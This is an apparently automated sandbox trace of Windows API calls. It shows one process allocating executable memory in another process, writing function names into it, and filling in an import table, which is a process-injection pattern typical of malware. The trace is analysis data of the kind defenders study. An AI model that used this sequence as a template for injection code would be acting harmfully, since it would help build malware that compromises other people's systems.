	[0155.009] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.010] ResetEvent (hEvent=0x488) returned 1
	[0155.010] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.010] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.010] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.010] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.010] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.010] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004028, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.011] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.011] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.011] lstrlenA (lpString="GetProcessHeap") returned 14
	[0155.011] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.011] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc1ec*, nSize=0xf, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc1ec*, lpNumberOfBytesWritten=0x128494*=0xf) returned 1
	[0155.011] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.011] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.011] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.011] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.012] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.012] ResetEvent (hEvent=0x488) returned 1
	[0155.012] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.012] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.012] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.012] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.012] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.012] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x1000402c, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.013] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.013] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.013] lstrlenA (lpString="HeapReAlloc") returned 11
	[0155.013] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.013] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc1de*, nSize=0xc, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc1de*, lpNumberOfBytesWritten=0x128494*=0xc) returned 1
	[0155.013] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.013] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.013] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.014] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.014] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.014] ResetEvent (hEvent=0x488) returned 1
	[0155.014] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.014] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.014] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.014] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.014] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.015] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004030, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.015] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.015] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.015] lstrlenA (lpString="HeapAlloc") returned 9
	[0155.015] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.015] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc1d2*, nSize=0xa, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc1d2*, lpNumberOfBytesWritten=0x128494*=0xa) returned 1
	[0155.016] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.016] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.016] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.016] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.016] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.016] ResetEvent (hEvent=0x488) returned 1
	[0155.016] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.017] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.017] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.017] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.017] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.017] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004034, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.017] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.017] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.017] lstrlenA (lpString="lstrlenW") returned 8
	[0155.017] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.018] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc240*, nSize=0x9, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc240*, lpNumberOfBytesWritten=0x128494*=0x9) returned 1
	[0155.018] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.018] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.018] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.018] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.018] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.019] ResetEvent (hEvent=0x488) returned 1
	[0155.019] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.019] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.019] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.019] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.019] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.019] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004038, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.020] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.020] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.020] lstrlenA (lpString="GetModuleHandleA") returned 16
	[0155.020] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.020] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc1be*, nSize=0x11, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc1be*, lpNumberOfBytesWritten=0x128494*=0x11) returned 1
	[0155.020] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.020] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.020] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.020] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.021] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.021] ResetEvent (hEvent=0x488) returned 1
	[0155.021] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.021] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.021] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.021] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.021] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.022] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x1000403c, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.022] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.022] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.022] lstrlenA (lpString="UnhandledExceptionFilter") returned 24
	[0155.022] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.022] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc51c*, nSize=0x19, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc51c*, lpNumberOfBytesWritten=0x128494*=0x19) returned 1
	[0155.023] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.023] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.023] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.023] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.023] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.023] ResetEvent (hEvent=0x488) returned 1
	[0155.023] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.024] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.024] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.024] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.024] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.024] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004040, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.024] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.024] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.024] lstrlenA (lpString="GetCurrentProcess") returned 17
	[0155.024] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.025] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc508*, nSize=0x12, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc508*, lpNumberOfBytesWritten=0x128494*=0x12) returned 1
	[0155.025] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.025] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.025] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.025] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.025] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.026] ResetEvent (hEvent=0x488) returned 1
	[0155.026] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.026] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.026] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.026] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.026] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.026] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004044, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.026] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.027] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.027] lstrlenA (lpString="TerminateProcess") returned 16
	[0155.027] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.027] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc4f4*, nSize=0x11, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc4f4*, lpNumberOfBytesWritten=0x128494*=0x11) returned 1
	[0155.027] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.027] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.027] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.027] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.028] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.028] ResetEvent (hEvent=0x488) returned 1
	[0155.028] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.028] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.028] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.028] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.028] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.028] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004048, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.029] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.029] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.029] lstrlenA (lpString="GetSystemTimeAsFileTime") returned 23
	[0155.029] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.029] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc4da*, nSize=0x18, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc4da*, lpNumberOfBytesWritten=0x128494*=0x18) returned 1
	[0155.029] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.029] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.029] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.029] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.030] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.030] ResetEvent (hEvent=0x488) returned 1
	[0155.030] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.030] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.030] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.030] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.030] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.031] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x1000404c, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.031] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.031] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.031] lstrlenA (lpString="GetCurrentProcessId") returned 19
	[0155.031] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.031] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc4c4*, nSize=0x14, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc4c4*, lpNumberOfBytesWritten=0x128494*=0x14) returned 1
	[0155.032] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.032] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.032] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.032] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.032] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.032] ResetEvent (hEvent=0x488) returned 1
	[0155.032] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.032] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.033] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.033] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.033] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.033] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004050, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.033] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.033] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.033] lstrlenA (lpString="GetCurrentThreadId") returned 18
	[0155.033] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
